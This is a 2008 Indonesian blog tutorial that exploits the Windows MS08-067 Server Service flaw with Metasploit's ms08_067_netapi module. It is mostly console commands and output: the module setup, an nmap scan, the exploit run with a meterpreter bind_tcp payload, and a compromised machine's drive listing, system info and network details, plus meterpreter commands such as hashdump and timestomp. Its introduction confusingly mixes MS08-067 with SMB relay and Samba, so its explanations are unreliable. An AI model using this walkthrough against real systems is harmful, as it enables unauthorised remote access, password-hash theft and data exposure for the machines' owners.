Wednesday, December 03, 2008

Exploit Windows Universal dengan Tools Framework - Metasploit dan SMB Relay (hdm)

Ada apa dengan MS08-067 ? berikut penjelasannya …
Kali ini saya mencoba share kepada semua bagaimana saya menerapkan metode exploit SMB relay Client, mencoba mengakses SMB service , dimana attacker dapat menerobos Samba jika mereka menjalankan internet explorer atau outlook express.
Metode ini dipublish oleh Sir Dystic selama @tlantacon pada tahun 2001 dan di implementasikan pada metasploit juli 2007. hal ini yang membuat rasa penasaran saya bagaimana metode exploit itu dijalankan , berikut artikel yang saya buat.
Download metasploit framework terbaru atau bisa mengunjungi http://www.metasploit.com

root@boc [~/metasploit]# wget http://spool.metasploit.com/releases/framework-3.2.tar.gz
root@boc [~/metasploit]# tar -zxvf framework-3.2.tar.gz
root@boc [~/metasploit]# cd framework-3.2
mroot@boc [~/metasploit/framework-3.2]# ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #
=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux



-) Tampilkan Command
msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
load Load a framework plugin
loadpath Searches for and loads modules from a path
quit Exit the console
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the console library version number

Lihat versi dari metasploit
msf > version
Framework: 3.2-release.5962
Console : 3.2-release.5773

Masuk ke exploit samba ms08_067
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting
Melihat Info exploit ini
msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5888
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm
Brett Moore

Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
10 Windows XP SP2 Arabic (NX)
11 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
12 Windows XP SP2 Chinese - Simplified (NX)
13 Windows XP SP2 Chinese - Traditional (NX)
14 Windows XP SP2 Czech (NX)
15 Windows XP SP2 Danish (NX)
16 Windows XP SP2 German (NX)
17 Windows XP SP2 Greek (NX)
18 Windows XP SP2 Spanish (NX)
19 Windows XP SP2 Finnish (NX)
20 Windows XP SP2 French (NX)
21 Windows XP SP2 Hebrew (NX)
22 Windows XP SP2 Hungarian (NX)
23 Windows XP SP2 Italian (NX)
24 Windows XP SP2 Japanese (NX)
25 Windows XP SP2 Korean (NX)
26 Windows XP SP2 Dutch (NX)
27 Windows XP SP2 Norwegian (NX)
28 Windows XP SP2 Polish (NX)
29 Windows XP SP2 Portuguese - Brazilian (NX)
30 Windows XP SP2 Portuguese (NX)
31 Windows XP SP2 Russian (NX)
32 Windows XP SP2 Swedish (NX)
33 Windows XP SP2 Turkish (NX)
34 Windows XP SP3 Arabic (NX)
35 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
36 Windows XP SP3 Chinese - Simplified (NX)
37 Windows XP SP3 Chinese - Traditional (NX)
38 Windows XP SP3 Czech (NX)
39 Windows XP SP3 Danish (NX)
40 Windows XP SP3 German (NX)
41 Windows XP SP3 Greek (NX)
42 Windows XP SP3 Spanish (NX)
43 Windows XP SP3 Finnish (NX)
44 Windows XP SP3 French (NX)
45 Windows XP SP3 Hebrew (NX)
46 Windows XP SP3 Hungarian (NX)
47 Windows XP SP3 Italian (NX)
48 Windows XP SP3 Japanese (NX)
49 Windows XP SP3 Korean (NX)
50 Windows XP SP3 Dutch (NX)
51 Windows XP SP3 Norwegian (NX)
52 Windows XP SP3 Polish (NX)
53 Windows XP SP3 Portuguese - Brazilian (NX)
54 Windows XP SP3 Portuguese (NX)
55 Windows XP SP3 Russian (NX)
56 Windows XP SP3 Swedish (NX)
57 Windows XP SP3 Turkish (NX)

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 8 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

*> interupt
Sampai Disini saya membuka shell box saya melakukan nmap seperti dibawah ini

root@boc [~]# nmap 10.11.21.29 -p 445
Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-02 18:18 WIT
Interesting ports on 10.11.21.29:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:16:76:7C:BA:D7 (Intel)

*>next jump ( back to metasploit )

Pilih target IP
msf exploit(ms08_067_netapi) > set RHOST 10.11.121.29
RHOST => 10.11.21.29


Pilih tipe exploit
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
Pilih exploit OS ( 0 – deteksi OS )
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.11.21.200:48769 -> 10.11.21.29:4444)
Terlihat diatas kita masuk session 1 dan kita berhasil menyusup ke salah satu target

Lihat direktori
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..


meterpreter > d:
meterpreter > ls

Listing: D:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 $AVG8.VAULT$
100666/rw-rw-rw- 91315 fil Thu Jan 01 07:00:00 +0700 1970 2512920190_7b59712cac.jpg
40555/r-xr-xr-x 0 dir Thu Jan 01 07:00:00 +0700 1970 BOC
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 IDM
40555/r-xr-xr-x 0 dir Thu Jan 01 07:00:00 +0700 1970 MD
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 New Folder (2)
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 PALBOMS
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 PC GAMES
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 PEPES
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 RECYCLER
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 Rully.F
100666/rw-rw-rw- 5005997 fil Thu Jan 01 07:00:00 +0700 1970 SafariSetup.exe.part
100666/rw-rw-rw- 129 fil Thu Jan 01 07:00:00 +0700 1970 Shortcut to CD Drive.lnk
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 System Volume Information
100666/rw-rw-rw- 1786056 fil Thu Jan 01 07:00:00 +0700 1970 TTPODSKINS.sisx
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 Temp
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 Trik Internet Gratis
100666/rw-rw-rw- 84997 fil Thu Jan 01 07:00:00 +0700 1970 bendera.jpg
100666/rw-rw-rw- 22911 fil Thu Jan 01 07:00:00 +0700 1970 bitie.txt
100666/rw-rw-rw- 2828444 fil Thu Jan 01 07:00:00 +0700 1970 dd8a672b68c207a0ff02f90a272e76e2.rar
100666/rw-rw-rw- 4107 fil Thu Jan 01 07:00:00 +0700 1970 image001.jpg
100666/rw-rw-rw- 39901 fil Thu Jan 01 07:00:00 +0700 1970 indah.jpg
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 indh
100666/rw-rw-rw- 221867 fil Thu Jan 01 07:00:00 +0700 1970 indonesia1.jpg
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 kriss
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 mustofa
100666/rw-rw-rw- 908 fil Thu Jan 01 07:00:00 +0700 1970 permintaan dephub aly hasny.txt
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 sri_numpang_mas
100666/rw-rw-rw- 37504 fil Thu Jan 01 07:00:00 +0700 1970 viewphotos.php.htm
40777/rwxrwxrwx 0 dir Thu Jan 01 07:00:00 +0700 1970 viewphotos.php_files
40555/r-xr-xr-x 0 dir Thu Jan 01 07:00:00 +0700 1970 zul99umb

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel


Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory


Stdapi: Networking Commands
===========================

Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table


Stdapi: System Commands
=======================

Command Description
------- -----------
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

Command Description
------- -----------
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components


Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

Melihat Operasi sistem sang target
meterpreter > sysinfo
Computer: BOC-BOM
OS : Windows XP (Build 2600, Service Pack 2).
Melihat ip di windows target
meterpreter > ipconfig
Intel(R) PRO/100 VE Network Connection - Packet Scheduler Miniport
Hardware MAC: 00:16:76:7c:ba:d7
IP Address : 10.11.21.29
Netmask : 255.255.255.0
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > exit
root@boc [~/metasploit/framework-3.2]# exit
logout

referensi :
www.metasploit.com
www.milw0rm.com
Patching your system now :
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
thanks to : Allah SWT , my greats parent , all staff & member www.sekuritionline.net , www.newhack.org
see my blog : www.inetholic.tk , thesims - iqbal@sekuritionline.net

No comments:

Post a Comment